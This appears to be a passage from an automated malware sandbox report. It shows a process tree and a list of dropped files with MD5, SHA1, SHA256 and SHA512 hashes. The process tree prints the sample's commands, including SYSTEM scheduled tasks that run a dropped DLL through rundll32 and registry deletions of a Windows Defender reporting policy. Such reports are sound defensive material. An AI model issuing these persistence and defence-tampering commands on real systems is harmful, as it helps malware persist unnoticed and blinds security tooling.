C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dOThrINOfEcGPPqKs2" /F /xml "C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR\VSHiTSx.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZuMFfllVmyQmxJihDZV2" /F /xml "C:\Program Files (x86)\pqzHHOUJlDLoC\chxTLJi.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:912
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WxeKxhacHpvHIAGHf" /SC once /ST 05:57:02 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\TKLYYQlZQscfmQGO\NaXGkNRY\eBrDeYJ.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1780
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "WxeKxhacHpvHIAGHf"3⤵PID:268
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1380
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:564
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1448
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JApWNoHZsVVCavdbE"3⤵PID:1812
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\TKLYYQlZQscfmQGO\NaXGkNRY\eBrDeYJ.dll",#1 /site_id 5254032⤵PID:2024
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\TKLYYQlZQscfmQGO\NaXGkNRY\eBrDeYJ.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1720 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WxeKxhacHpvHIAGHf"4⤵PID:1048
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1504
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1748
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1612
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5e85a08559d3b08f318c9abd2c5f6be9d
SHA1e149da16007e57a3586182826d23930ecc855be2
SHA25690647a60c147377318c722c282fd98c1227b9be2392c074afa4829f655b9cf76
SHA51207d29255f86975cf8a48209d4cecf9181064c89801bcbd0a3db9fafac259b3780a5066a2b9ddfca32b9a93e9cd18ab22c1f8d89bdd28ff9f45b0e49f70b9dd21
-
Filesize
2KB
MD5f0c10457887ef50d964dc254cc8e1479
SHA1691efa16bdeaaa5d75d691f1c5b662f725e0e502
SHA2565ff9a70a35ee8f5ea66a9b992214c08907a9c8253219833968a7f49497670823
SHA51213d6df1505177aad5677ff2484f2e0f5766fb344ce7b310427fa9cbf246b3240d0a502a6d169dacaf9938c316ab9589b290046362b6ae41b06d9a6530306f43e
-
Filesize
2KB
MD5766359d82927ae6607eca97fbe64b071
SHA12c64c818d53b23a2e950358422fb21609f193e04
SHA25650af2355dbb524eb7b91313cd465b8f92bcca46ec2842d41c4d3bf781f1d45f3
SHA512aef20408e0f2cc29c6a1a5af6520accadaaf97c50dd4971fde09bcc6f6259632586e7c2cab212920d2063286ae521ee0a7e9a37590201d3ddf668e73e5716fca
-
Filesize
2KB
MD5ddac0c0468b66f7a96a5de6307972e8b
SHA17184dc325ffccd054ec77011f6e331b02753d6db
SHA2561bba9b0fe79dd3190908e91ee01fefbf4fbc4537b193f201fb85e0d929e6d656
SHA5127c39189cc560ebd68e325299f64d8eeff932c5bd06b60661156cf366463912af73eccc1b464984e91fd1fd476a93c4aa05a8f3711f5f2e810d1db2067b3141c2
-
Filesize
2KB
MD5965cd1e4515a5b5365fc7028fe630435
SHA1443e42d357fa6f2dcbd20d47a07d09f339ffc837
SHA256c12a295bf7726dc1fd99dce08275ed6f7402ef2761ac017bc444b33b6c6218a2
SHA5125b5ebd17fa3a3654400e8539fad99d2720160d3a48a9b89c6b701a759a164234b6163a3e0273a67afbc100532774d95a2ddf8b3d99013de651764468b410c7c4
-
Filesize
6.3MB
MD592de6a594267b9dd35e3937bb44ccfab
SHA15d51c774ecea5eb868c2894e9c8c40e7375f5dde
SHA2569971938d3bfac3fcaf767a9b2dbc94c42ecf230aa857a0e18063d9412c862dcc
SHA512200a6a611699f2abf81449df6ba6297758c2b38d26c402472560b48a59a50b151c689775260a62d01fac7c48c9c48f56351bc8698c763fd02d084f83413bae76
-
Filesize
6.3MB
MD592de6a594267b9dd35e3937bb44ccfab
SHA15d51c774ecea5eb868c2894e9c8c40e7375f5dde
SHA2569971938d3bfac3fcaf767a9b2dbc94c42ecf230aa857a0e18063d9412c862dcc
SHA512200a6a611699f2abf81449df6ba6297758c2b38d26c402472560b48a59a50b151c689775260a62d01fac7c48c9c48f56351bc8698c763fd02d084f83413bae76
-
Filesize
6.8MB
MD5766e838b15a6b3db9c13bf512fa79209
SHA1910f71c94030771cc665fb63d397f7d68a166a74
SHA256aa340749e1240e6eabead602a0b1c4a997b69a68a7f6fbb8a0b553f122a40872
SHA512eb0c25c6ac815d01440d8190f51624c917b5cd207dc6b1087d187d37dae97bae3f34255e2dfa9ed1d429834e6e0be952ca6963d202534909c608754f9f99de6e
-
Filesize
6.8MB
MD5766e838b15a6b3db9c13bf512fa79209
SHA1910f71c94030771cc665fb63d397f7d68a166a74
SHA256aa340749e1240e6eabead602a0b1c4a997b69a68a7f6fbb8a0b553f122a40872
SHA512eb0c25c6ac815d01440d8190f51624c917b5cd207dc6b1087d187d37dae97bae3f34255e2dfa9ed1d429834e6e0be952ca6963d202534909c608754f9f99de6e
-
Filesize
6.8MB
MD5766e838b15a6b3db9c13bf512fa79209
SHA1910f71c94030771cc665fb63d397f7d68a166a74
SHA256aa340749e1240e6eabead602a0b1c4a997b69a68a7f6fbb8a0b553f122a40872
SHA512eb0c25c6ac815d01440d8190f51624c917b5cd207dc6b1087d187d37dae97bae3f34255e2dfa9ed1d429834e6e0be952ca6963d202534909c608754f9f99de6e
-
Filesize
6.8MB
MD5766e838b15a6b3db9c13bf512fa79209
SHA1910f71c94030771cc665fb63d397f7d68a166a74
SHA256aa340749e1240e6eabead602a0b1c4a997b69a68a7f6fbb8a0b553f122a40872
SHA512eb0c25c6ac815d01440d8190f51624c917b5cd207dc6b1087d187d37dae97bae3f34255e2dfa9ed1d429834e6e0be952ca6963d202534909c608754f9f99de6e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD530bd213f136e9c6a96d3657ad54a5b45
SHA1c642b5639bc305cb3a48b30425d7ea0d424a0eb6
SHA25645ba6e69dd5e9acba3e0016e3a8d26e0214cdfa5189698cfd78193c692f51c28
SHA512a0b5a3462875e533e0f81c493138b96909c97d49adbded486ab72edd8ccba95efedeb8181830b55d548bcd69dfc039d67a4c7bb015ee159a253e11ef103d793e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD505eae8f9cf63744bca0ea4a23642683f
SHA1d4a20c788b8343e3e503d7d182500f5279989726
SHA256deb181ef14c5f3cc1e42271c97aeb29792e83486225f465367da0271739096b0
SHA512c1f0bf933c2282cab2942975dbba1fcc4e74eff137fc5bc283becc7b752cc4bcba29987195474fb52b237d042b210497611445960ce5b3c3548bd9d77072f79f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5584372409a98af2dd04c4953b43a6fca
SHA12f27e866aa34c9e9a423572c702f522b33f61487
SHA256e435e11620176295b9b49017a2828591a4cca7bce11f3718997834d6db0c301a
SHA51232c41063d00693aa53252f63b1d8e8bf23e21c6f19999670fe5ed12b12f622e910c580d0973aca364fdbd384d964feb689147a221327095cf769455dc6be7aeb
-
Filesize
8KB
MD5d85c9884f5b08f2129c2c8f935165a5a
SHA1c61c45f7785372e797f1bce89dd330bf1b6e7c84
SHA256b81d5bb6de6449fa55acfa45f1f4696b6849652bc1d824c40b0adf7c480d8451
SHA512657cbb9a13fb32817034f6f1fe2d2a4f23033c7de4f230f96b4b46e6d0b02d4f1492a270399fe9e86e6c01a94b65310a329c8d4ddbbd7b434148a4977f1a0eb5
-
Filesize
6.2MB
MD57950d0e69cc8d5e3c721473548778772
SHA16b364e9874c100a9837566180145e0473047bcac
SHA25660708b5b8dee74479d05fcae141f0e6ef2a31301374fb1525551a0b7d703c1b0
SHA5122c48b5ecddefe638c5d7e109d2383eda2d916161ddd2ee5d6f69d7747dfcaed56f148b93fbc7f707bfdfe95013ec18d38951c2263a95f181b6917b936e09fda3
-
Filesize
6.8MB
MD5766e838b15a6b3db9c13bf512fa79209
SHA1910f71c94030771cc665fb63d397f7d68a166a74
SHA256aa340749e1240e6eabead602a0b1c4a997b69a68a7f6fbb8a0b553f122a40872
SHA512eb0c25c6ac815d01440d8190f51624c917b5cd207dc6b1087d187d37dae97bae3f34255e2dfa9ed1d429834e6e0be952ca6963d202534909c608754f9f99de6e
-
Filesize
6.8MB
MD5766e838b15a6b3db9c13bf512fa79209
SHA1910f71c94030771cc665fb63d397f7d68a166a74
SHA256aa340749e1240e6eabead602a0b1c4a997b69a68a7f6fbb8a0b553f122a40872
SHA512eb0c25c6ac815d01440d8190f51624c917b5cd207dc6b1087d187d37dae97bae3f34255e2dfa9ed1d429834e6e0be952ca6963d202534909c608754f9f99de6e
-
Filesize
4KB
MD5a398cecd710773d5e6bf6976b8cba6c4
SHA1435f07d85cb247b21f109045331bef26904fccaf
SHA2569977fb4351f1925927678f2145ba0c963c7c1b743f04b6193b72e2e1f2f1b471
SHA51224875fa32faef7320b39d36a0b7da5e76bfdf0380accfaaedcb41e36a1063af6a418f50ec81de8d3ac0f07432073f46c9f7e8d8e960d6b85b521566453fadff8
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.3MB
MD592de6a594267b9dd35e3937bb44ccfab
SHA15d51c774ecea5eb868c2894e9c8c40e7375f5dde
SHA2569971938d3bfac3fcaf767a9b2dbc94c42ecf230aa857a0e18063d9412c862dcc
SHA512200a6a611699f2abf81449df6ba6297758c2b38d26c402472560b48a59a50b151c689775260a62d01fac7c48c9c48f56351bc8698c763fd02d084f83413bae76
-
Filesize
6.3MB
MD592de6a594267b9dd35e3937bb44ccfab
SHA15d51c774ecea5eb868c2894e9c8c40e7375f5dde
SHA2569971938d3bfac3fcaf767a9b2dbc94c42ecf230aa857a0e18063d9412c862dcc
SHA512200a6a611699f2abf81449df6ba6297758c2b38d26c402472560b48a59a50b151c689775260a62d01fac7c48c9c48f56351bc8698c763fd02d084f83413bae76
-
Filesize
6.3MB
MD592de6a594267b9dd35e3937bb44ccfab
SHA15d51c774ecea5eb868c2894e9c8c40e7375f5dde
SHA2569971938d3bfac3fcaf767a9b2dbc94c42ecf230aa857a0e18063d9412c862dcc
SHA512200a6a611699f2abf81449df6ba6297758c2b38d26c402472560b48a59a50b151c689775260a62d01fac7c48c9c48f56351bc8698c763fd02d084f83413bae76
-
Filesize
6.3MB
MD592de6a594267b9dd35e3937bb44ccfab
SHA15d51c774ecea5eb868c2894e9c8c40e7375f5dde
SHA2569971938d3bfac3fcaf767a9b2dbc94c42ecf230aa857a0e18063d9412c862dcc
SHA512200a6a611699f2abf81449df6ba6297758c2b38d26c402472560b48a59a50b151c689775260a62d01fac7c48c9c48f56351bc8698c763fd02d084f83413bae76
-
Filesize
6.8MB
MD5766e838b15a6b3db9c13bf512fa79209
SHA1910f71c94030771cc665fb63d397f7d68a166a74
SHA256aa340749e1240e6eabead602a0b1c4a997b69a68a7f6fbb8a0b553f122a40872
SHA512eb0c25c6ac815d01440d8190f51624c917b5cd207dc6b1087d187d37dae97bae3f34255e2dfa9ed1d429834e6e0be952ca6963d202534909c608754f9f99de6e
-
Filesize
6.8MB
MD5766e838b15a6b3db9c13bf512fa79209
SHA1910f71c94030771cc665fb63d397f7d68a166a74
SHA256aa340749e1240e6eabead602a0b1c4a997b69a68a7f6fbb8a0b553f122a40872
SHA512eb0c25c6ac815d01440d8190f51624c917b5cd207dc6b1087d187d37dae97bae3f34255e2dfa9ed1d429834e6e0be952ca6963d202534909c608754f9f99de6e
-
Filesize
6.8MB
MD5766e838b15a6b3db9c13bf512fa79209
SHA1910f71c94030771cc665fb63d397f7d68a166a74
SHA256aa340749e1240e6eabead602a0b1c4a997b69a68a7f6fbb8a0b553f122a40872
SHA512eb0c25c6ac815d01440d8190f51624c917b5cd207dc6b1087d187d37dae97bae3f34255e2dfa9ed1d429834e6e0be952ca6963d202534909c608754f9f99de6e
-
Filesize
6.8MB
MD5766e838b15a6b3db9c13bf512fa79209
SHA1910f71c94030771cc665fb63d397f7d68a166a74
SHA256aa340749e1240e6eabead602a0b1c4a997b69a68a7f6fbb8a0b553f122a40872
SHA512eb0c25c6ac815d01440d8190f51624c917b5cd207dc6b1087d187d37dae97bae3f34255e2dfa9ed1d429834e6e0be952ca6963d202534909c608754f9f99de6e
-
Filesize
6.2MB
MD57950d0e69cc8d5e3c721473548778772
SHA16b364e9874c100a9837566180145e0473047bcac
SHA25660708b5b8dee74479d05fcae141f0e6ef2a31301374fb1525551a0b7d703c1b0
SHA5122c48b5ecddefe638c5d7e109d2383eda2d916161ddd2ee5d6f69d7747dfcaed56f148b93fbc7f707bfdfe95013ec18d38951c2263a95f181b6917b936e09fda3
-
Filesize
6.2MB
MD57950d0e69cc8d5e3c721473548778772
SHA16b364e9874c100a9837566180145e0473047bcac
SHA25660708b5b8dee74479d05fcae141f0e6ef2a31301374fb1525551a0b7d703c1b0
SHA5122c48b5ecddefe638c5d7e109d2383eda2d916161ddd2ee5d6f69d7747dfcaed56f148b93fbc7f707bfdfe95013ec18d38951c2263a95f181b6917b936e09fda3
-
Filesize
6.2MB
MD57950d0e69cc8d5e3c721473548778772
SHA16b364e9874c100a9837566180145e0473047bcac
SHA25660708b5b8dee74479d05fcae141f0e6ef2a31301374fb1525551a0b7d703c1b0
SHA5122c48b5ecddefe638c5d7e109d2383eda2d916161ddd2ee5d6f69d7747dfcaed56f148b93fbc7f707bfdfe95013ec18d38951c2263a95f181b6917b936e09fda3
-
Filesize
6.2MB
MD57950d0e69cc8d5e3c721473548778772
SHA16b364e9874c100a9837566180145e0473047bcac
SHA25660708b5b8dee74479d05fcae141f0e6ef2a31301374fb1525551a0b7d703c1b0
SHA5122c48b5ecddefe638c5d7e109d2383eda2d916161ddd2ee5d6f69d7747dfcaed56f148b93fbc7f707bfdfe95013ec18d38951c2263a95f181b6917b936e09fda3